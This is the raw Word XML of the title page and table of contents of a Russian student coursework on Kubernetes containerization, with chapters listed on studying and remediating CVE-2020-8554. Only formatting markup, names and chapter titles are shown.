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C41A1" w14:textId="77777777" w:rsidR="008E5F54" w:rsidRPr="008E5F54" w:rsidRDefault="008E5F54" w:rsidP="00635E67">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc518292936"/>
      <w:r w:rsidRPr="008E5F54">
        <w:t>Министерство образования и науки Российской Федерации</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308E8ABE" w14:textId="77777777" w:rsidR="008E5F54" w:rsidRPr="008E5F54" w:rsidRDefault="008E5F54" w:rsidP="00635E67">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="008E5F54">
        <w:t>Санкт-Петербургский политехнический университет Петра Великого</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676D58EA" w14:textId="77777777" w:rsidR="008E5F54" w:rsidRPr="008E5F54" w:rsidRDefault="008E5F54" w:rsidP="00635E67">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="008E5F54">
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F8E432" w14:textId="5D993DE9" w:rsidR="00AD0196" w:rsidRDefault="00996FAE" w:rsidP="00635E67">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00996FAE">
        <w:t>Институт компьютерных наук и кибербезопасности</w:t>
      </w:r>
      <w:r w:rsidR="00AD0196" w:rsidRPr="00AD0196">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F572E2D" w14:textId="6985D268" w:rsidR="008E5F54" w:rsidRPr="00635E67" w:rsidRDefault="008E5F54" w:rsidP="00635E67">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E935049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347BD57D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5891FF10" w14:textId="4DE5E202" w:rsidR="008E5F54" w:rsidRDefault="008E5F54" w:rsidP="00635E67">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="071C34BB" w14:textId="601FA0C8" w:rsidR="00996FAE" w:rsidRDefault="00996FAE" w:rsidP="00635E67">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3867F0FF" w14:textId="06954666" w:rsidR="00996FAE" w:rsidRDefault="00996FAE" w:rsidP="00635E67">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27BA6FC7" w14:textId="365EEC07" w:rsidR="00996FAE" w:rsidRDefault="00996FAE" w:rsidP="00635E67">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72918E00" w14:textId="55017E73" w:rsidR="00996FAE" w:rsidRDefault="00996FAE" w:rsidP="00635E67">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="355CE3B6" w14:textId="4798801A" w:rsidR="00996FAE" w:rsidRDefault="00996FAE" w:rsidP="00635E67">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73F2E13A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47B754CC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3FFC0CE1" w14:textId="3C419823" w:rsidR="008E5F54" w:rsidRPr="00B9220F" w:rsidRDefault="00B9220F" w:rsidP="00B9220F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>КУРСОВАЯ РАБОТА</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4386F7EB" w14:textId="07059768" w:rsidR="008E5F54" w:rsidRDefault="00B9220F" w:rsidP="00B9220F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="009618D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Контейнеризация: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Kubernetes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100AF71D" w14:textId="7EAF4F00" w:rsidR="00B9220F" w:rsidRPr="00B9220F" w:rsidRDefault="00B9220F" w:rsidP="009618D3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>по дисциплине «Операционные системы»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE1C698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0F8C6EFE" w14:textId="52A20473" w:rsidR="008E5F54" w:rsidRDefault="008E5F54" w:rsidP="00635E67">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C918379" w14:textId="77777777" w:rsidR="00996FAE" w:rsidRPr="008E5F54" w:rsidRDefault="00996FAE" w:rsidP="00635E67">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="198ABB7A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7A46E972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0D76A81D" w14:textId="77777777" w:rsidR="008E5F54" w:rsidRPr="008E5F54" w:rsidRDefault="008E5F54" w:rsidP="00635E67">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center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683"/>
        <w:gridCol w:w="2749"/>
        <w:gridCol w:w="2134"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E5F54" w:rsidRPr="008E5F54" w14:paraId="70E86F9F" w14:textId="77777777" w:rsidTr="00635E67">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3683" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C1C1104" w14:textId="77777777" w:rsidR="008E5F54" w:rsidRPr="008E5F54" w:rsidRDefault="008E5F54" w:rsidP="00635E67">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="008E5F54">
              <w:t>Выполнил</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2749" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BC58DE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64E2EE9A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1B189140" w14:textId="77777777" w:rsidTr="00635E67">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3683" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="200F1343" w14:textId="29463793" w:rsidR="008E5F54" w:rsidRPr="008E5F54" w:rsidRDefault="00771F0D" w:rsidP="00635E67">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">студент гр. </w:t>
            </w:r>
            <w:r w:rsidR="00B9220F">
              <w:t>5151003/40002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2749" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D62A569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4C70B690" w14:textId="05C8D689" w:rsidR="008E5F54" w:rsidRPr="008E5F54" w:rsidRDefault="00B9220F" w:rsidP="00B9220F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:right="-187" w:firstLine="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>Михайлич М. И.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5F54" w:rsidRPr="008E5F54" w14:paraId="22DBA0A2" w14:textId="77777777" w:rsidTr="00635E67">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3683" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1888FD0C" w14:textId="77777777" w:rsidR="008E5F54" w:rsidRPr="008E5F54" w:rsidRDefault="008E5F54" w:rsidP="00635E67">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2749" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A60830F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4390BE26" w14:textId="77777777" w:rsidR="008E5F54" w:rsidRPr="008E5F54" w:rsidRDefault="008E5F54" w:rsidP="00635E67">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5F54" w:rsidRPr="008E5F54" w14:paraId="19F7DB35" w14:textId="77777777" w:rsidTr="00635E67">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3683" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EAE1EBF" w14:textId="41482395" w:rsidR="008E5F54" w:rsidRPr="008E5F54" w:rsidRDefault="00D60E1A" w:rsidP="00635E67">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Преподаватель</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2749" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58DE728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68DDA460" w14:textId="77777777" w:rsidR="008E5F54" w:rsidRPr="008E5F54" w:rsidRDefault="008E5F54" w:rsidP="00635E67">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5F54" w:rsidRPr="008E5F54" w14:paraId="42F51CC2" w14:textId="77777777" w:rsidTr="00635E67">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3683" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54A13C0C" w14:textId="1A67B650" w:rsidR="008E5F54" w:rsidRPr="00B43A23" w:rsidRDefault="00B9220F" w:rsidP="00635E67">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>ассистент</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2749" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48897040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5BA4238F" w14:textId="56FA7804" w:rsidR="008E5F54" w:rsidRPr="00B43A23" w:rsidRDefault="00B9220F" w:rsidP="00635E67">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>Югай П. Э.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5F54" w:rsidRPr="008E5F54" w14:paraId="666C1B35" w14:textId="77777777" w:rsidTr="00635E67">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3683" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="505D2953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21072FB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2BBF56A7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5C7A8098" w14:textId="77777777" w:rsidTr="00635E67">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3683" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C5CB896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6C2247C1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7A279B37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3E4E7548" w14:textId="77777777" w:rsidTr="00635E67">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3683" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62A42B8C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4F277C04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38CD7D58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12AD15E0" w14:textId="77777777" w:rsidTr="00635E67">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3683" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62F61C9A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16B42ACC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18DA8856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6D304002" w14:textId="77777777" w:rsidTr="00635E67">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3683" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="152CE28F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75FC338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6752C3D9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687F4CE9" w14:textId="77777777" w:rsidTr="00635E67">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3683" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F14874F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0197C1D6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35F3E404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268A9780" w14:textId="77777777" w:rsidTr="00635E67">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3683" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76B67BA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51B3B7C6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769E009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</w:tbl>
    <w:p w14:paraId="2DE2C4C5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6FA3870A" w14:textId="4169806D" w:rsidR="008E5F54" w:rsidRDefault="008E5F54" w:rsidP="00635E67">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44A69451" w14:textId="77777777" w:rsidR="00D60E1A" w:rsidRPr="008E5F54" w:rsidRDefault="00D60E1A" w:rsidP="00635E67">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F8083CA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304CD1A6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0E138B20" w14:textId="77777777" w:rsidR="008E5F54" w:rsidRPr="008E5F54" w:rsidRDefault="008E5F54" w:rsidP="00635E67">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="008E5F54">
        <w:t>Санкт-Петербург</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5809DD20" w14:textId="06432CE6" w:rsidR="00063C8F" w:rsidRDefault="00921F59" w:rsidP="008F07CE">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:sectPr w:rsidR="00063C8F" w:rsidSect="00832CE4">
          <w:headerReference w:type="even" r:id="rId8"/>
          <w:footerReference w:type="default" r:id="rId9"/>
          <w:headerReference w:type="first" r:id="rId10"/>
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="1134" w:right="567" w:bottom="1134" w:left="1134" w:header="709" w:footer="567" w:gutter="0"/>
          <w:pgNumType w:start="1"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="381"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidR="00D60E1A">
        <w:t>2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="008F07CE">
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237409A6" w14:textId="39A540FD" w:rsidR="008A7235" w:rsidRDefault="00BA1F4F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r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00015840">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc231834629" w:history="1">
        <w:r w:rsidR="008A7235" w:rsidRPr="004F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>ВВЕДЕНИЕ</w:t>
        </w:r>
        <w:r w:rsidR="008A7235">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008A7235">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008A7235">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc231834629 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008A7235">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008A7235">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="008A7235">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r w:rsidR="008A7235">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5690E1AE" w14:textId="0D4884D2" w:rsidR="008A7235" w:rsidRDefault="008A7235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1834633" w:history="1">
        <w:r w:rsidRPr="004F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:bCs/>
          </w:rPr>
          <w:t>1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4F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>ТЕОРЕТИЧЕСКИЕ ИССЛЕДОВАНИЯ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_Toc231834633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F2EBEBC" w14:textId="7C998CC2" w:rsidR="008A7235" w:rsidRDefault="008A7235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834634" w:history="1">
        <w:r w:rsidRPr="004F6D91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F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">Понятие </w:t>
        </w:r>
        <w:r w:rsidRPr="004F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>kuberntets</w:t>
        </w:r>
        <w:r w:rsidRPr="004F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> и назначение оркестровки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_Toc231834634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57E2B4" w14:textId="428927C6" w:rsidR="008A7235" w:rsidRDefault="008A7235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834635" w:history="1">
        <w:r w:rsidRPr="004F6D91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67422E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>А</w:t>
        </w:r>
        <w:r w:rsidRPr="004F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">рхитектура </w:t>
        </w:r>
        <w:r w:rsidRPr="004F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Kubernetes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_Toc231834635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A0D3E8" w14:textId="51E9AD50" w:rsidR="008A7235" w:rsidRDefault="008A7235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834636" w:history="1">
        <w:r w:rsidRPr="004F6D91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F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">Основные компоненты </w:t>
        </w:r>
        <w:r w:rsidRPr="004F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Kubernetes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_Toc231834636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ECD04D" w14:textId="43010EA2" w:rsidR="008A7235" w:rsidRDefault="008A7235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834647" w:history="1">
        <w:r w:rsidRPr="004F6D91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F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">Особенности, преимущества и недостатки </w:t>
        </w:r>
        <w:r w:rsidRPr="004F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Kubernetes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_Toc231834647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FFF010" w14:textId="50B608A7" w:rsidR="008A7235" w:rsidRDefault="008A7235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834648" w:history="1">
        <w:r w:rsidRPr="004F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>1.5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F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">Существующие аналоги </w:t>
        </w:r>
        <w:r w:rsidRPr="004F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>kubernetes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_Toc231834648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A98AB3" w14:textId="3C91D5AE" w:rsidR="008A7235" w:rsidRDefault="008A7235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834649" w:history="1">
        <w:r w:rsidRPr="004F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>1.6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EF1225">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>В</w:t>
        </w:r>
        <w:r w:rsidRPr="004F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>опросы безопасности контейнеризации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_Toc231834649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3ADCA8" w14:textId="39AD5E1A" w:rsidR="008A7235" w:rsidRDefault="008A7235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1834650" w:history="1">
        <w:r w:rsidRPr="004F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>2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4F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Ход работы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_Toc231834650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92FD49A" w14:textId="7B20F710" w:rsidR="008A7235" w:rsidRDefault="008A7235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834651" w:history="1">
        <w:r w:rsidRPr="004F6D91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EF1225">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>И</w:t>
        </w:r>
        <w:r w:rsidRPr="004F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">сследование </w:t>
        </w:r>
        <w:r w:rsidRPr="004F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>CVE</w:t>
        </w:r>
        <w:r w:rsidRPr="004F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> в экосистеме </w:t>
        </w:r>
        <w:r w:rsidRPr="004F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Kubernetes</w:t>
        </w:r>
        <w:r w:rsidRPr="004F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink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_Toc231834651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FBDAEE" w14:textId="5191A8F9" w:rsidR="008A7235" w:rsidRDefault="008A7235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834652" w:history="1">
        <w:r w:rsidRPr="004F6D91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F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">Подготовка ос для исследования </w:t>
        </w:r>
        <w:r w:rsidRPr="004F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>CVE</w:t>
        </w:r>
        <w:r w:rsidRPr="004F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>-2020-8554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_Toc231834652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B0AC524" w14:textId="05F4FD8B" w:rsidR="008A7235" w:rsidRDefault="008A7235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834653" w:history="1">
        <w:r w:rsidRPr="004F6D91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EF1225">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>П</w:t>
        </w:r>
        <w:r w:rsidRPr="004F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>рактическая реализация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_Toc231834653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739A00A" w14:textId="237DFD3E" w:rsidR="008A7235" w:rsidRDefault="008A7235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1834654" w:history="1">
        <w:r w:rsidRPr="004F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>3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4F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>CVE-2020-8554 устранение уязвимости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_Toc231834654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38BD6EAF" w14:textId="7C60F025" w:rsidR="008A7235" w:rsidRDefault="008A7235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834655" w:history="1">
        <w:r w:rsidRPr="004F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
            <w:lang w:val="en-US"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EF1225">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>З</w:t>
        </w:r>
        <w:r w:rsidRPr="004F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">апрет на создание </w:t>
        </w:r>
        <w:r w:rsidRPr="004F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>externalips</w:t>
        </w:r>
        <w:r w:rsidRPr="004F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> через Vali</w:t>
        </w:r>
        <w:r w:rsidRPr="004F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>datingadmissionpolicy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_Toc231834655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64BFB40" w14:textId="6FA57908" w:rsidR="008A7235" w:rsidRDefault="008A7235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1834656" w:history="1">
        <w:r w:rsidRPr="004F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>ЗАКЛЮЧЕНИЕ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_Toc231834656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3BF2B19F" w14:textId="615D5A6B" w:rsidR="008A7235" w:rsidRDefault="008A7235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1834657" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>С</w:t>
        </w:r>
        <w:r w:rsidRPr="004F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>писок использованных источников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_Toc231834657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689505C3" w14:textId="1118AF80" w:rsidR="008A7235" w:rsidRDefault="008A7235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1834658" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>П</w:t>
        </w:r>
        <w:r w:rsidRPr="004F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>риложение 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_Toc231834658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380B0459" w14:textId="3E0E3314" w:rsidR="008A7235" w:rsidRDefault="008A7235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1834659" w:history="1">
        <w:r w:rsidRPr="004F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Приложение</w:t>
        </w:r>
        <w:r w:rsidRPr="004F6D91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="004F6D91">
          <w:rPr>
